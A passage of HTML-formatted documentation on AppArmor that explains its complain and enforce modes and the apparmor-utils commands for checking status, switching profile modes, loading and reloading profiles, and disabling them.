<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">Complaining/Learning: profile violations are permitted and logged. Useful for testing and developing new profiles.</span></div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 0px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">Enforced/Confined: enforces profile policy as well as logging the violation.</span></div>
</li>
</ul>
</div>
</div>
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span>
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span>
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span>
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span>
<br />
<div class="hgroup" style="background-color: white; border-bottom-color: rgb(204, 193, 193); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; line-height: 19px; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<h2 class="title" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 28px; margin-bottom: 8px; margin-left: 0px; margin-right: 0px; margin-top: 1em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif; font-size: small;">Using AppArmor</span></h2>
</div>
<div class="region" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<div class="contents" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">The <span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">apparmor-utils</span> package contains command line utilities that you can use to change the <span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">AppArmor</span> execution mode, find the status of a profile, create new profiles, etc.</span></div>
<div class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<ul class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; list-style-image: initial; list-style-position: initial; list-style-type: decimal; margin-bottom: 8px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;"><span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">apparmor_status</span> is used to view the current status of AppArmor profiles.</span></div>
<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo apparmor_status</span>
</span></pre>
</div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;"><span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">aa-complain</span> places a profile into <span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">complain</span> mode.</span></div>
<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo aa-complain /path/to/bin</span>
</span></pre>
</div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;"><span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">aa-enforce</span> places a profile into <span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">enforce</span> mode.</span></div>
<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo aa-enforce /path/to/bin</span>
</span></pre>
</div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">The <span class="file filename" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">/etc/apparmor.d</span> directory is where the AppArmor profiles are located. It can be used to manipulate the <span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">mode</span> of all profiles.</span></div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">Enter the following to place all profiles into complain mode:</span></div>
<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo aa-complain /etc/apparmor.d/*</span>
</span></pre>
</div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">To place all profiles in enforce mode:</span></div>
<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo aa-enforce /etc/apparmor.d/*</span>
</span></pre>
</div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;"><span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">apparmor_parser</span> is used to load a profile into the kernel. It can also be used to reload a currently loaded profile using the <span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">-r</span> option. To load a profile:</span></div>
<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">cat /etc/apparmor.d/profile.name | sudo apparmor_parser -a</span>
</span></pre>
</div>
<div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">To reload a profile:</span></div>
<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">cat /etc/apparmor.d/profile.name | sudo apparmor_parser -r</span>
</span></pre>
</div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;"><span class="file filename" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">service apparmor</span> can be used to <span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">reload</span> all profiles:</span></div>
<div class="screen" style="border-bottom-width: 0px; border-color: initial; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<pre class="contents " style="background-color: #f3f3f3; border-bottom-color: rgb(193, 180, 150); border-bottom-style: dashed; border-bottom-width: 1px; border-color: initial; border-image: initial; border-left-color: rgb(193, 180, 150); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(193, 180, 150); border-right-style: dashed; border-right-width: 1px; border-style: initial; border-top-color: rgb(193, 180, 150); border-top-style: dashed; border-top-width: 1px; font-style: inherit; line-height: 16px; margin-bottom: 8px; padding-bottom: 0.5em; padding-left: 1em; padding-right: 1em; padding-top: 0.5em; vertical-align: baseline; white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: Times, 'Times New Roman', serif;"><span class="cmd command" style="background-color: #f7f6f5; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">sudo service apparmor reload</span>
</span></pre>
</div>
</li>
<li class="list itemizedlist" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 14px; margin-bottom: 8px; margin-left: 2.4em; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left; vertical-align: baseline;"><div class="para" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
<span style="font-family: Times, 'Times New Roman', serif;">The <span class="file filename" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: inherit; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">/etc/apparmor.d/disable</span> directory can be used along with the <span class="app application" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">apparmor_parser -R</span> option to <span class="em emphasis" style="border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-style: italic; line-height: 1.5; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">disable</span> a profile.</span></div>
